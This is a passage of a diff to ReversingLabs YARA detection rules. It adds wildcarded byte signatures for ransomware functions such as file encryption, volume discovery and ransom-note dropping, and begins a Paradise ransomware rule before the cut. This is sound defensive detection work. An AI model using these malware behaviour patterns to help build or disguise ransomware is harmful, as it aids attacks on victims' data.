+            83 C3 ?? 48 3B DF 75 ?? 4C 89 BD ?? ?? ?? ?? 48 8B 46 ?? 48 3B 46 ?? 74 ?? 4C 89 38
+            4C 89 78 ?? 4C 89 78 ?? 41 B8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B C8 E8 ?? ?? ?? ?? 4C
+            89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48 83 46 ?? ?? EB ?? 4C 8D 44
+            24 ?? 48 8B D0 48 8B CE E8 ?? ?? ?? ?? 90 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 FF C2
+            48 8B 4C 24 ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1
+            48 83 C0 ?? 48 83 F8 ?? 77 ?? E8 ?? ?? ?? ?? 4C 89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ??
+            ?? C6 44 24 ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 54 24 ?? 49 8B CE FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 48 8B C6 48 81 C4
+        }
+		$set_default_icon_p1 = {
+            48 89 5C 24 ?? 48 89 4C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ??
+            48 8B F1 45 33 ED 44 89 6C 24 ?? 4C 8B 35 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 4C 8B F8 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B C8 49 2B CE 49 3B CF 0F 82 ?? ??
+            ?? ?? 4C 8D 25 ?? ?? ?? ?? 48 83 3D ?? ?? ?? ?? ?? 4C 0F 43 25 ?? ?? ?? ?? 4C 89 6C
+            24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 4B 8D 2C 37 BB ?? ?? ?? ?? 48 8D 7C 24 ?? 48 3B
+            EB 0F 86 ?? ?? ?? ?? 48 8B DD 48 83 CB ?? 48 3B D8 76 ?? 48 8B D8 48 B8 ?? ?? ?? ??
+            ?? ?? ?? ?? 48 8D 0C 00 EB ?? B8 ?? ?? ?? ?? 48 3B D8 48 0F 42 D8 48 8D 4B ?? 48 B8
+            ?? ?? ?? ?? ?? ?? ?? ?? 48 3B C8 0F 87 ?? ?? ?? ?? 48 03 C9 48 81 F9 ?? ?? ?? ?? 72
+            ?? 48 8D 41 ?? 48 3B C1 0F 86 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ??
+            ?? ?? ?? 48 8D 78 ?? 48 83 E7 ?? 48 89 47 ?? EB ?? 48 85 C9 74 ?? E8 ?? ?? ?? ?? 48
+            8B F8 EB ?? 49 8B FD 48 89 7C 24 ?? 48 89 6C 24 ?? 48 89 5C 24 ?? 4B 8D 1C 36 4C 8B
+        }
+		$set_default_icon_p2 = {
+            C3 49 8B D4 48 8B CF E8 ?? ?? ?? ?? 48 8D 0C 3B 4F 8D 04 3F 48 8D 15 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 66 44 89 2C 6F BB ?? ?? ?? ?? 89 5C 24 ?? 48 8D 54 24 ?? 48 83 7C 24 ??
+            ?? 48 0F 43 54 24 ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 84 24 ?? ?? ?? ??
+            48 89 44 24 ?? 4C 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 44 89 6C 24 ?? 45 33 C9 45 33
+            C0 48 C7 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CE 48 83 7E ?? ?? 72 ??
+            48 8B 0E 8B 46 ?? 03 C0 89 44 24 ?? 48 89 4C 24 ?? 44 8B CB 45 33 C0 48 8D 15 ?? ??
+            ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 33 D2 B9 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? EB ?? 4C 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 4C 24
+            ?? 45 33 C9 44 8B C0 33 D2 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 E3 ?? 89 5C 24 ?? 48
+            8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B C1 48 81
+            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 77 ??
+            E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 44 89 6C 24 ?? 48 8B CE
+            E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C
+            5F 5E 5D C3
+        }
+		$cmd_prompt = {
+            48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8B EC 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4
+            48 89 45 ?? 48 8B D9 4C 8D 05 ?? ?? ?? ?? 33 FF 48 8D 4D ?? 33 D2 48 89 7D ?? E8 ??
+            ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 85 DB 75 ?? 48 8B 4D ?? 48 85 C9 0F 84 ?? ??
+            ?? ?? 33 D2 E8 ?? ?? ?? ?? 48 8B 4D ?? 8B D8 E8 ?? ?? ?? ?? 85 DB 40 0F 94 C7 E9 ??
+            ?? ?? ?? 48 8B 45 ?? 48 8D 0D ?? ?? ?? ?? 48 89 45 ?? 48 89 4D ?? 48 89 5D ?? 48 89
+            7D ?? 48 85 C0 74 ?? E8 ?? ?? ?? ?? 8B 18 E8 ?? ?? ?? ?? 45 33 C9 4C 8D 45 ?? 33 C9
+            89 38 48 8B 55 ?? E8 ?? ?? ?? ?? 48 8B F8 83 F8 ?? 74 ?? E8 ?? ?? ?? ?? 89 18 EB ??
+            E8 ?? ?? ?? ?? 83 38 ?? 74 ?? E8 ?? ?? ?? ?? 83 38 ?? 74 ?? 48 8B 4D ?? E8 ?? ?? ??
+            ?? 83 CF ?? EB ?? E8 ?? ?? ?? ?? 89 18 48 8D 15 ?? ?? ?? ?? 45 33 C9 4C 8D 45 ?? 48
+            89 55 ?? 33 C9 E8 ?? ?? ?? ?? 48 8B F8 48 8B 4D ?? E8 ?? ?? ?? ?? 8B C7 48 8B 4D ??
+            48 33 CC E8 ?? ?? ?? ?? 4C 8D 5C 24 ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3 5D C3
+        }
+		$exclude_from_encryption = {
+            66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D
+            4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B
+            55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ??
+            ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 89 75 ?? 48 83 FF ?? 0F 85
+            ?? ?? ?? ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ??
+            66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D
+            4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B
+            55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ??
+            ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 89 75 ?? 48 83 FF ?? 0F 85
+            ?? ?? ?? ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ??
+            66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D
+            4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B
+            55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ??
+            ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0
+        }
+		$encrypt_files_v1 = {
+            41 83 CC ?? 44 89 64 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 FF ?? 48 0F 43 8C 24 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 8B F8 41 83 E4 ?? 44 89 64 24 ?? 48 8B 94 24 ?? ?? ?? ?? 48
+            83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ??
+            ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 49
+            ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ??
+            ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 9C 24 ?? ?? 00 00 40 F6 C7 ?? 74
+            ?? 49 8B CF E8 ?? ?? ?? ?? 90 48 BE ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 4C
+            8D 35 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 8B CF E8 ?? ?? ?? ?? C6 84
+            24 ?? ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B F0 48
+            89 9C 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 4C 8B 70 ?? 48
+            83 78 ?? ?? 72 ?? 48 8B 30 48 8D 8C 24 ?? ?? ?? ?? 49 83 FE ?? 73 ?? 41 B8 ?? ?? ??
+            ?? 48 8B D6 E8 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ??
+            ?? EB ?? 4C 89 AC 24 ?? ?? ?? ?? 49 8B FE 48 83 CF ?? 48 89 BC 24 ?? ?? ?? ?? 49 3B
+            FD 49 0F 47 FD 48 8D 57 ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 4E 8D 04 75 ?? ??
+            ?? ?? 48 8B D6 48 8B C8 E8 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 89 BC 24
+        }
+		$find_system_volumes_v2 = {
+            BA ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 0F 1F 44 00 ?? 4C 8D 8D ??
+            ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 89 74 24 ?? 48 89 74 24 ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ??
+            48 89 74 24 ?? 45 33 C9 45 33 C0 33 D2 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 4C 8D 04 00 48 8D 85 ?? ?? ?? ?? 49 03 C0 48 89 74 24 ?? 48 89 74
+            24 ?? 48 89 74 24 ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 89 74 24 ?? 48 8D
+            8D ?? ?? ?? ?? 48 3B C8 74 ?? 49 D1 F8 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ??
+            ?? ?? 90 48 8B 43 ?? 48 3B 43 ?? 74 ?? 48 89 30 48 89 70 ?? 48 89 70 ?? 41 B8 ?? ??
+            ?? ?? 48 8D 54 24 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ??
+            ?? 66 89 74 24 ?? 48 83 43 ?? ?? EB ?? 4C 8D 44 24 ?? 48 8B D0 48 8B CB E8 ?? ?? ??
+            ?? 90 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B
+            C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8
+            ?? 77 ?? E8 ?? ?? ?? ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 89 74 24 ?? 41
+            B8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48
+            8B CF FF 15 ?? ?? ?? ?? 48 8B C3 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5F 5E
+            5D C3
+        }
+		$drop_ransom_note = {
+            48 83 3D ?? ?? ?? ?? ?? 48 0F 43 15 ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 8D 4D ?? E8
+            ?? ?? ?? ?? 48 8B D8 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 45 8D 46 ?? 48 8B D0 48 8D
+            4D ?? E8 ?? ?? ?? ?? 4C 89 73 ?? 48 C7 43 ?? ?? ?? ?? ?? 66 44 89 33 BE ?? ?? ?? ??
+            89 75 ?? 83 E6 ?? 89 75 ?? 48 8B 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48
+            8B 4D ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83
+            C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 75 ?? 48 C7 45 ?? ?? ?? ??
+            ?? 66 44 89 75 ?? 48 8D 4D ?? 48 83 7D ?? ?? 48 0F 43 4D ?? 4C 89 74 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 48 8B D8 48 83 F8 ?? 74 ?? 4C 89 74 24 ?? 45 33 C9 41 B8 ?? ?? ?? ?? 48 8D 15
+            ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 E6 ?? 89 75 ??
+            48 8B 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA
+            ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 75 ?? 48 8B 57
+            ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 0F 48 81 FA ?? ?? ?? ?? 72 ?? 48
+            83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 77 ?? 49 8B C8 E8 ?? ?? ?? ??
+            4C 89 77 ?? 48 C7 47 ?? ?? ?? ?? ?? 66 44 89 37 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ??
+            49 8B 73 ?? 49 8B 7B
+        }
+		$encrypt_files_v2_p1 = {
+            BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 48 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89
+            85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 85 C9 0F 84 ?? ?? ?? ?? 49 8B FA 49 8B D1 4D 85 D2
+            74 ?? 4C 8B C1 4D 2B C1 0F B7 02 66 41 39 04 10 75 ?? 48 83 C2 ?? 48 83 EF ?? 75 ??
+            49 2B CB 48 D1 F9 E9 ?? ?? ?? ?? 48 83 C1 ?? E9 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48
+            8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 90 48 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ??
+            48 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B BD ?? ?? ?? ?? B2 ?? 48 8D 4C 24 ?? E8 ??
+            ?? ?? ?? B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 0B 00 F3 0F 7F 45 ??
+            48 89 75 ?? 48 89 75 ?? 48 8D 45 ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ??
+            C6 45 ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 45 ?? 48 C7 45 ?? ?? ?? ?? ?? C6 45
+            ?? ?? 48 8D 45 ?? 83 E0 ?? 48 8D 44 05 ?? 48 89 45 ?? 89 75 ?? C7 45 ?? ?? ?? ?? ??
+            48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ??
+            ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89
+            44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48
+            8D 05 ?? ?? ?? ?? 48 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48
+            C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C
+            8B E8 48 89 44 24 ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 89 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49
+        }
+		$encrypt_files_v2_p2 = {
+            8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D7 48 8D 0D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8B CF 41 B8 ?? ?? ?? ?? 49 8B D5
+            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D5 48 8B 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 83 C1 ?? 41 B8 ?? ?? ?? ?? 48 8B D7 E8 ?? ?? ?? ??
+            BF ?? ?? ?? ?? 4C 3B FF 0F 8D ?? ?? ?? ?? F2 0F 10 35 ?? ?? ?? ?? 48 8B FE 49 8B C7
+            48 2B C7 48 99 83 E2 ?? 48 03 C2 48 C1 F8 ?? 4C 8B F0 F2 0F 59 35 ?? ?? ?? ?? 0F 57
+            C0 F2 48 0F 2A C0 F2 0F 59 F0 F2 48 0F 2C CE 48 85 C9 0F 85 ?? ?? ?? ?? 4D 85 FF 0F
+            8E ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ??
+            90 48 8D 35 ?? ?? ?? ?? 48 89 75 ?? 4C 8D 35 ?? ?? ?? ?? 4C 89 75 ?? 48 8D 05 ?? ??
+            ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24
+            ?? 4D 8B CF 45 33 C0 48 8B D3 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49
+            81 FF ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? F2 0F 10 35 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24
+            ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48
+            8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ??
+            48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 4C 8B CF 45 33 C0 48 8B D3 49 8B CE
+            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 99 48 F7 F9 4C 8B E8 48 85 C0 75 ?? 48 8D 45 ?? 48
+        }
+		$encrypt_files_v2_p3 = {
+            89 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 35 ?? ?? ?? ?? 48 89
+            75 ?? 4C 8D 35 ?? ?? ?? ?? 4C 89 75 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ??
+            ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 4D 8B CF 45 33 C0 48 8B D3
+            48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B 6C 24 ?? E9 ?? ?? ?? ?? 4D 85 F6 0F 8E ??
+            ?? ?? ?? 4D 8B FD 49 C1 E7 ?? 4C 8B A5 ?? ?? ?? ?? 90 48 8D 45 ?? 48 89 44 24 ?? 48
+            8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05
+            ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89
+            85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 41 B9 ?? ?? ?? ?? 4C 8B C7 48 8B D3 49 8B
+            CC E8 ?? ?? ?? ?? 49 03 F5 49 03 FF 49 3B F6 7C ?? 4C 8B A5 ?? ?? ?? ?? 4C 8B 6C 24
+            ?? 48 8D 35 ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 4C 8B C3 48 8B 95
+            ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 4D 8B C4
+            48 8D 95 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 95 ?? ?? ?? ?? 48
+            85 D2 74 ?? 48 8B FA 33 C0 B9 ?? ?? ?? ?? F3 AA 48 8B CA E8 ?? ?? ?? ?? 90 4D 85 ED
+            74 ?? 49 8B FD 33 C0 B9 ?? ?? ?? ?? F3 AA 49 8B CD E8 ?? ?? ?? ?? 90 48 89 74 24 ??
+            4C 89 74 24
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STA-R TOV" and pe.signatures [ i ] . serial == "08:20:23:87:91:12:28:9b:f3:51:d2:97:cc:8e:fc:fc" and 1573430400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( $find_files ) and ( all of ( $find_system_volumes_v1_p* ) ) and ( all of ( $set_default_icon_p* ) ) and ( $cmd_prompt ) and ( $exclude_from_encryption ) and ( $encrypt_files_v1 ) ) or ( ( $find_files ) and ( $cmd_prompt ) and ( $find_system_volumes_v2 ) and ( $drop_ransom_note ) and ( all of ( $encrypt_files_v2_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0D53690631Dd186C56Be9026Eb931Ae2 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Paradise : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Paradise ransomware."
 		author = "ReversingLabs"
-		id = "4f60613c-4162-5b3d-989f-f79a06450f4d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "9a92a05c-5f26-59ed-9934-a24bb7c31d8d"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4834-L4850"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3d0a80c062800f935fa3837755e8a91245e01a4e2450a05fecab5564cb62c15c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Paradise.yara#L1-L81"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fc029bee999ec72416ac91d8386d4d270070035ad078bcab1dec11eea032c10b"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Paradise"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_files = {
+            53 56 57 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 89 75 ?? 85 F6
+            0F 84 ?? ?? ?? ?? FF 75 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 53 56 FF
+            D7 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ??
+            ?? ?? 83 65 ?? ?? 8B 45 ?? 8B 74 85 ?? 8D 95 ?? ?? ?? ?? 85 F6 74 ?? 0F B7 02 83 F8
+            ?? 72 ?? 8D 48 ?? 83 F8 ?? 76 ?? 8B C8 0F B7 06 83 F8 ?? 72 ?? 83 F8 ?? 77 ?? 83 C0
+            ?? 3B C8 0F B7 02 75 ?? 66 85 C0 74 ?? 83 C2 ?? 83 C6 ?? EB ?? 0F B7 02 EB ?? 66 3B
+            06 1B C0 83 E0 ?? 40 EB ?? 33 C0 85 C0 0F 84 ?? ?? ?? ?? FF 45 ?? 83 7D ?? ?? 72 ??
+            8B 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 56 FF D7 83 C4 ?? F6 85 ??
+            ?? ?? ?? ?? 74 ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 80 3D ?? ?? ?? ?? ?? 74 ?? BA
+            ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? EB ?? F6 85 ?? ?? ??
+            ?? ?? 74 ?? A1 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            85 C0 75 ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ??
